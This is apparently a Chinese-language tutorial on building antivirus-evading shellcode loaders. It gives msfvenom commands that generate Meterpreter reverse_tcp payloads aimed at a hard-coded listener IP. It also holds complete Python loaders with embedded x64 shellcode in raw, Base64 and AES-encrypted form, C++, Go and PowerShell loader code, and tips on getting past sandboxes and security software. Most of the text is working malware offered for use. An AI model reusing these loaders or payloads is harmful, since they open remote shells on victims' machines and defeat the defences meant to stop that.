shellcode loader shellcode要想执行需要经历如下几个过程:
申请一块内存;
把shellcode加载到这块内存;
执行这块内存。
这过程中需要注意如下几点:
加载dll,采用动态调用的方式,可以避免IAT的hook;
不要直接申请rwx(读写执行)的内存,可先申请rw内存,后面再改为可执行,杀软对rwx的内存很敏感;
加载到内存的方法非常多,除了常见的copy和move还有uuid这种加载既能达到加密shellcode的效果,还能直接加载到内存;
执行内存,还可以用回调来触发如EnumChildWindows;
API调用中间可以插入一些没用的代码,打乱API调用;
适当加一些sleep,可以过一些沙箱。
shellcode变异加密混淆回调执行代码 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 # C/C++-ShellCode分析-OD&IDA&朔源 1、EXE朔源-IP及端口-杀毒分析 2、编译修改-IP及端口-威胁感知 reverse_tcp.asm https://www.cnblogs.com/Akkuman/p/12859091.html https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb # C/C++-ShellCode变异-编码混淆加密算法 Xor Aes Hex Rc4 Rsa等 https://github.com/Arno0x/ShellcodeWrapper msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw 1、python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi xor CS&MSF msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw python xor.py -s shellcode.bin -d payload.c -n 10 -r out.bin 2、python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi aes 3、Hex msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c https://gchq.github.io/CyberChef/ https://github.com/ByPassAVTeam/ShellcodeLoader LoaderMaker.exe download.dat(hex数据) xiaodi.exe(生成文件名) 4、Rc4 msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c https://blog.csdn.net/weixin_45590789/article/details/105536623 # C/C++-回调执行代码-汇编&句柄&API&UI等 Callback_Shellcode_Injection-main https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection
加载器 https://shu1l.github.io/2021/08/17/mian-sha-xue-xi-shellcode-jia-zai-mian-sha/
https://xz.aliyun.com/t/9385
https://xz.aliyun.com/t/12253
python加载器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import ctypesshellcode = bytearray ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b" ) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0 ), ctypes.c_int(len (shellcode)), ctypes.c_int(0x3000 ), ctypes.c_int(0x40 )) buf = (ctypes.c_char * len (shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len (shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.c_int(ptr), ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.pointer(ctypes.c_int(0 ))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1 ))
代码不是很长,可以看到主要调用的就是ctypes这个库。
ctypes 是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装。
主要流程
调用VirtualAlloc函数,来申请一块可读可写可执行的动态内存区域。
调用RtlMoveMemory函数,此函数从指定内存中复制内容至另一内存里。
调用CreateThread函数,在主线程的基础上创建一个新线程。
调用WaitForSingleObject函数,等待创建的线程运行结束。
当然目前来说这种比较原始的方式杀软已经杀很严了,所以之后更多要有混淆加密的操作。
常见的有Hex加密、AES加密、XOR加密、base64等等,或者可以自己写加密和解密,免杀效果会更好
HEX加密 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import ctypesbuf = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4a\x4f\x78\x4c\x00\x03\x8b\x02\x94\xad\x26\x3e\xe1\xe1\xa4\x48\xe2\xc0\xf1\x5b\x10\x17\x75\x09\x3f\x3d\xfa\xd0\xf9\xc2\x70\x02\xb3\xeb\x7c\x2d\x70\xfb\x34\x9e\x0e\x3e\x47\xcd\x1d\xc3\x4c\x0c\x33\x8b\xce\x7b\x5b\x2a\xdb\x40\xbc\x9b\x5e\x7b\x9a\x53\x88\x7e\x93\xf0\xbe\x6c\xde\x11\x29\x2d\xae\x8e\xa2\x39\xe5\x4f\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\xc6\x24\x6a\xc0\x95\x01\xb9\x1d\x74\x0d\xbf\x57\x5c\x3d\x4a\x7f\x60\xa3\x07\xe6\x08\xb1\x97\x28\xfb\xad\x21\x89\xc1\xd0\x3a\x97\xa6\x22\x1f\xfc\xf2\x84\xa4\x04\x48\x4d\xc3\x69\x8a\x56\xbf\xd8\x30\x44\x11\x09\x9d\xfe\xdb\x1b\x35\xfe\xd7\x4d\x11\x49\x87\x3b\x4d\xaa\x39\x95\x1c\x82\xd3\xf7\x21\xf3\xb6\x46\x0d\x3b\x7d\x66\x84\x3a\xba\xc0\xc7\x42\x21\x27\x69\x3b\xca\x10\x56\xb6\xfa\xe2\xec\x57\xd0\x7f\xbc\xa5\x7d\x30\xd8\x1c\x7e\x53\xc1\xf7\x5b\xd9\xce\x24\x21\x4a\x55\x03\x88\x0e\x72\x80\x51\x5a\x92\x37\x69\x22\xf4\x72\x5e\x9a\x97\xdf\x9c\x28\xa4\x6e\x52\x50\x94\x89\xa3\x74\x69\x4e\x7f\xa5\xd0\x6c\x59\x72\x13\xb5\xf4\xde\x21\x53\x1b\x9f\x52\x83\x86\x76\x93\x9c\x21\xec\xd5\x9c\x31\x17\x60\x03\x27\x71\xc2\x46\xea\xa4\x16\xda\xe3\x6e\x11\xef\x21\x28\xb7\xe8\x5f\x63\x1b\x34\xd9\xf6\xe4\xf6\x2a\x3b\xf6\x00\xda\x13\x93\x88\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2" shellcode = buf shellcode = bytearray (shellcode) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0 ), ctypes.c_int(len (shellcode)), ctypes.c_int(0x3000 ), ctypes.c_int(0x40 )) buf = (ctypes.c_char * len (shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len (shellcode)) ) handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.c_uint64(ptr), ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.pointer(ctypes.c_int(0 )) ) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1 ))
Base64混淆 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 import ctypesimport base64buf=b'/EiD5PDoyAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwJ1couAiAAAAEiFwHRnSAHQUItIGESLQCBJAdDjVkj/yUGLNIhIAdZNMclIMcCsQcHJDUEBwTjgdfFMA0wkCEU50XXYWESLQCRJAdBmQYsMSESLQBxJAdBBiwSISAHQQVhBWF5ZWkFYQVlBWkiD7CBBUv/gWEFZWkiLEulP////XWoASb53aW5pbmV0AEFWSYnmTInxQbpMdyYH/9VIMclIMdJNMcBNMclBUEFQQbo6Vnmn/9Xrc1pIicFBuGARAABNMclBUUFRagNBUUG6V4mfxv/V61lbSInBSDHSSYnYTTHJUmgAAkCEUlJBuutVLjv/1UiJxkiDw1BqCl9IifFIidpJx8D/////TTHJUlJBui0GGHv/1YXAD4WdAQAASP/PD4SMAQAA69Pp5AEAAOii////L0pPeEwAA4sClK0mPuHhpEjiwPFbEBd1CT89+tD5wnACs+t8LXD7NJ4OPkfNHcNMDDOLzntbKttAvJtee5pTiH6T8L5s3hEpLa6OojnlTwBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC81LjA7IEJPSUU5O0VOVVMpDQoAxiRqwJUBuR10Db9XXD1Kf2CjB+YIsZco+60hicHQOpemIh/88oSkBEhNw2mKVr/YMEQRCZ3+2xs1/tdNEUmHO02qOZUcgtP3IfO2Rg07fWaEOrrAx0IhJ2k7yhBWtvri7FfQf7ylfTDYHH5Twfdb2c4kIUpVA4gOcoBRWpI3aSL0cl6al9+cKKRuUlCUiaN0aU5/pdBsWXITtfTeIVMbn1KDhnaTnCHs1ZwxF2ADJ3HCRuqkFtrjbhHvISi36F9jGzTZ9uT2Kjv2ANoTk4gAQb7wtaJW/9VIMcm6AABAAEG4ABAAAEG5QAAAAEG6WKRT5f/VSJNTU0iJ50iJ8UiJ2kG4ACAAAEmJ+UG6EpaJ4v/VSIPEIIXAdLZmiwdIAcOFwHXXWFhYSAUAAAAAUMPon/3//zQzLjEzOC4yNy4xMgBJlgLS' buf=base64.b64decode(buf) shellcode = buf shellcode = bytearray (shellcode) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0 ), ctypes.c_int(len (shellcode)), ctypes.c_int(0x3000 ), ctypes.c_int(0x40 )) buf = (ctypes.c_char * len (shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len (shellcode)) ) handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.c_uint64(ptr), ctypes.c_int(0 ), ctypes.c_int(0 ), ctypes.pointer(ctypes.c_int(0 )) ) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1 ))
AES混淆 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_heximport ctypes,base64def add_to_16 (text ): if len (text.encode('utf-8' )) % 16 : add = 16 - (len (text.encode('utf-8' )) % 16 ) else : add = 0 text = text + ('\0' * add) return text.encode('utf-8' ) def decrypt (text ): key = '9999999999999999' .encode('utf-8' ) iv = b'qqqqqqqqqqqqqqqq' mode = AES.MODE_CBC cryptos = AES.new(key, mode, iv) plain_text = cryptos.decrypt(a2b_hex(text)) shellcode=bytes .decode(plain_text).rstrip('\0' ) return shellcode def zhixing (shellcode ): rwxpage = ctypes.windll.kernel32.VirtualAlloc(0 , len (shellcode), 0x1000 , 0x40 ) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len (shellcode)) handle = ctypes.windll.kernel32.CreateThread(0 , 0 , rwxpage, 0 , 0 , 0 ) ctypes.windll.kernel32.WaitForSingleObject(handle, -1 ) if __name__ == '__main__' : e='0e0d6b374430510532fb94ec3f9e3e933e26c58c784e26a7a50308a6cb9286b75810a376913a4d162ce26bf16c27d8924223ea45360e595f28130c67ef3e51c6f1b21d375aaa1b97e74bab97c9b87f80842cf3597d9b5cfbe361c30c54cce15aa6fafc88fd015f303c60a96900736b35f9d8aa9f0b8f1f89133d959a633e471a6b8aa5004d271541075a6bff3dcea93036aa3ebb4621eec32350be5b73e2aa90370b97c1544258f017466e8235f03b17b282ecbd6845340ca1f87e6f58a844974aa52f1544f92df67cc29046a14c0f6528c1b20e8f82e81ff182dba4d6320082ca98bb13d28ddc7304198039b87560a12054769073faa0bb0f07ac4b12cb19c48c7d3c002d19e5e6d439f1c822e7a6fbcef094f6840aec0672d8b2b669a0fed0bbe954260658ce63e4c75e307d47528fae505ee795a14a2f0e51812119e5480a6ee0b267be2df03994c8564aac446538a6fa2d65912ee020d783603ba3fb7bb5653994418cbe6d9a30c2730c043876d5713423d60d622fbfa418f25d28f3c6599df2d4458be05e1bfbd60abc3ef71cd64812681308f73920ef7fab1318758e8a940ba7eafa3599971b841069b67ef10b88ba58b9ad13ac676700394ec521eb040acd080f491903baa8352f8db8114ea920690978aea20c30855b786124f3d27b90155ee3533ee3620a5f48d26e38b60d786d2e7ff41a07fcc9c1e0abbacfce32b5765901b576fe110bed31374b8de6c4db5316c57dda772fe5b1736b5314e2a3b8b1d665e272024dfd433b0dbd0fef3981f5087866bba50a686575e2b0f26903a54172826e0bb3713cf85b29e227c69fb6f31ca2d462decc5e3213fbb472bbd91a47316ce02b7a99122543b7db75de61e5a34944f10c08dd5ecac8f3b7e28bbe24f2cb3ef6258ef404ab222b9f128acdeec3e8dd123273fb0db73f66fe6e06e6276e3294bac412689da195e240c37b0d7803ceab2deee1a4902ef3b85a1d81a5128591a31d7b12f1773c54fbd56ebdee86f19d0cd100dd83964c8525e2f3af81c4d19603483af04b8d2d21b026ae2af9edc293c66ee40d6be7ffa35b5b0e8e5ece4f9b15097ab1471b3fa5cc8d6ee1431a8a32562641e36fc5b44c422e25482ca319882691150f8713cd8d90ed3eacec170039923a8c4b70d64773260a30d23526356c31a40675b54d6546b1c84ae338f6173eeacb03a892331dc5e9cbf0b78a2bb5ceb434d7d72441565620a9c4ab156030f35ede7dad650483cbdf8e91d64250c6dbefe3ffeaa3ea77f82f270b48a232d35fb66db49aae980180625387a8bf317beed2f612c546f015864578629c020c8f2fca445bd03c74bf7bb882d051a9b8c55ce2cc73948ad171d3a802f8bbe1b542fc36b26171d2d02e2c4cd56e2bad9983145c7011d00e5cc77967b5b980ccb9b4fd6f28efcc8538cc62d5f9ddf9e67609ce9de733109f4c8ccfbfd705d068f2e09618838270591553d662713754382047a2f8dd65e6850db61bc4ad61606e' d = decrypt(e) d=base64.b64decode(d) zhixing(d)
#Python-打包器选择-Pyinstall&Py2exe&Nuitka 1 2 3 4 5 6 7 8 9 1 、pyinstaller-F, –onefile 打包一个单个文件,如果你的代码都写在一个.py文件的话,可以用这个,如果是多个.py文件就别用 -D, –onedir 打包多个文件,在dist中生成很多依赖文件,适合以框架形式编写工具代码,我个人比较推荐这样,代码易于维护 -K, –tk 在部署时包含 TCL/TK -a, –ascii 不包含编码.在支持Unicode的python版本上默认包含所有的编码. -d, –debug 产生debug版本的可执行文件 -w,–windowed,–noconsole 使用Windows子系统执行.当程序启动的时候不会打开命令行(只对Windows有效) -c,–nowindowed,–console 使用控制台子系统执行(默认)(只对Windows有效) 使用:pyinstaller -F test.py
py2exe 参考:https://hoxis.github.io/python-py2exe.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 安装:pip install py2exe 打包:python setup.py py2exe 代码: setup.py from distutils.core import setupimport py2exeINCLUDES = ['108-pickle-release' ] options = { "py2exe" : { "compressed" : 1 , "optimize" : 2 , "bundle_files" : 1 , "includes" : INCLUDES, "dll_excludes" : ['MSVCP90.dll' ] } } setup( version='1.0.0' , options=options, description="this is a xiaodi test" , zipfile=None , console=[{"script" : '108-pickle-release.py' }] )
Nuitka 参考:https://jiesonshan.github.io/2020/05/27/Nuitka%E6%89%93%E5%8C%85python%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95/
https://juejin.cn/post/7109310663851245605
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 --standalone:方便移植到其他机器,不用再安装python --show-memory --show-progress:展示整个安装的进度过程 --nofollow-imports:不编译代码中所有的import --follow-import -to=utils,src:需要编译成C++代码的指定的2 个包含源码的文件夹,这里用,来进行分隔。 --output-dir =out:指定输出的结果路径为out。 --windows-disable-console:运行exe取消弹框。 --mingw64 --standalone 独立环境,这是必须的(否则拷给别人无法使用) --windows-disable-console 没有CMD控制窗口 --output-dir =out 生成exe到out文件夹下面去 --show-progress 显示编译的进度,很直观 --show-memory 显示内存的占用 --include-qt-plugins=sensible,styles 打包后PyQt的样式就不会变了 --plugin-enable=qt-plugins 需要加载的PyQt插件 --plugin-enable=tk-inter 打包tkinter模块的刚需 --plugin-enable=numpy 打包numpy,pandas,matplotlib模块的刚需 --plugin-enable=torch 打包pytorch的刚需 --plugin-enable=tensorflow 打包tensorflow的刚需 --windows-icon-from -ico=你的.ico 软件的图标 --windows-company-name=Windows下软件公司信息 --windows-product-name=Windows下软件名称 --windows-file-version=Windows下软件的信息 --windows-product-version=Windows下软件的产品信息 --windows-file-description=Windows下软件的作用描述 --windows-uac-admin=Windows下用户可以使用管理员权限来安装 --linux-onefile-icon=Linux下的图标位置 --onefile 像pyinstaller一样打包成单个exe文件 --include-package=复制比如numpy,PyQt5 这些带文件夹的叫包或者轮子 --include-module=复制比如when.py 这些以.py结尾的叫模块 使用:nuitka --mingw64 --standalone --show-memory --show-progress --nofollow-imports --follow-import -to=utils,src --output-dir =out 108. py
C++加载器 对于C/C++来说,常用的加载方式有函数指针执行、内联汇编指令、伪指令等方式 .
函数指针执行 简单的C代码:
1 2 3 4 5 6 char shellcode[] = "" ;int main (int argc, char const *argv[]) (*(void (*)() shellcode)(); return 0 ; }
(void(*)() shellcode 将shellcode转换为函数指针,指向void形式的函数,然后再通过一个*对指针进行取值,之后通过()双括号调用函数进而执行shell从而执行shellocde。
动态内存加载 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #include <Windows.h> #include <stdio.h> #include <string.h> #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"" ) unsigned char buf[] = "shellcode" ;int main () char *Memory; Memory=VirtualAlloc (NULL , sizeof (buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy (Memory, buf, sizeof (buf)); ((void (*)())Memory)(); }
原理和上面python实现类似。
内联汇编指令 汇编指令相关的知识可以看这里:
https://www.cxyzjd.com/article/Hkenter/2855771
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 include <stdio.h> #include <windows.h> #pragma comment(linker,"/INCREMENTAL:NO" ) #pragma comment(linker, "/section:.data,RWE" ) unsigned char shellcode[] ="\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1" "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c" "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04" "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93" "\xca\xec\x3f\xcd\x34\xa2\x40\xc4" ;int main (int argc, char **argv) __asm { mov eax, offset shellcode; JMP EAX } return 0 ; }
其他写法
1 2 3 4 5 6 7 8 void RunShellCode () __asm { lea eax, shellcode; jmp eax; } }
MOV EAX, offset shellcode
JMP EAX
伪指令 伪指令(Pseudo Instruction)是用于对汇编过程进行控制的指令,该类指令并不是可执行指令,没有机器代码,只用于汇编过程中为汇编程序提供汇编信息。 例如,提供如下信息:哪些是指令、哪些是数据及数据的字长、程序的起始地址和结束地址等。
1 2 3 4 5 6 7 8 9 void RunShellCode_5 () __asm { mov eax, offset shellcode; _emit 0xFF ; _emit 0xE0 ; } }
go加载器 https://www.cnblogs.com/newbe3three/p/16214882.html
https://cn-sec.com/archives/981565.html
动态内存加载 核心代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 package main import ( "syscall" "unsafe" ) const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 ) var ( kernel32 = syscall.MustLoadDLL("kernel32.dll" ) ntdll = syscall.MustLoadDLL("ntdll.dll" ) VirtualAlloc = kernel32. MustFindProc("VirtualAlloc" ) RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory" ) ) func main () { xor_shellcode := []byte{0x89 , 0x3d , 0xf6 , 0x91 , 0x85 , 0x9d , 0xb9 , 0x75 , 0x75 , 0x75 , 0x34 , 0x24 , 0x34 , 0x25 , 0x27 , 0x24 , 0x23 , 0x3d , 0x44 , 0xa7 , 0x10 , 0x3d , 0xfe , 0x27 , 0x15 , 0x3d , 0xfe ...} addr, _, err := VirtualAlloc.Call (0 , uintptr (len (xor_shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if err != nil && err.Error () != "The operation completed successfully." { syscall.Exit (0 ) } _, _, err = RtlCopyMemory.Call (addr, (uintptr)(unsafe.Pointer (&xor_shellcode[0 ])), uintptr (len (xor_shellcode))) if err != nil && err.Error () != "The operation completed successfully." { syscall.Exit (0 ) } syscall.Syscall (addr, 0 , 0 , 0 , 0 ) }
其实原理与上面python或者C/C++类似。
通过声明匿名函数,然后指向读入的ShellCode字节数据的那片内存,并将内存设置为可读可写可执行,之后调用函数就将ShellCode运行起来了。
可以利用加密混淆shellcode,也可以利用不同的加载器代码去写加载器、、
加壳工具(SafengineShielden)
内联C加载 核心代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 package main import "C" import "unsafe" func main () { buf := "" buf += "xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c" ...省略... buf += "xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2" shellcode := []byte (buf) C.call ((*C.char )(unsafe.Pointer (&shellcode[0 ]))) }
powershell 手工混淆:
填充垃圾数据
直接在base64编码上添加,然后解码前进行还原(为了让杀毒判断失效)
直接在原型代码上添加,然后解码还原(可过火绒)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Set-StrictMode -Version 2 $DoIt = @' ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlw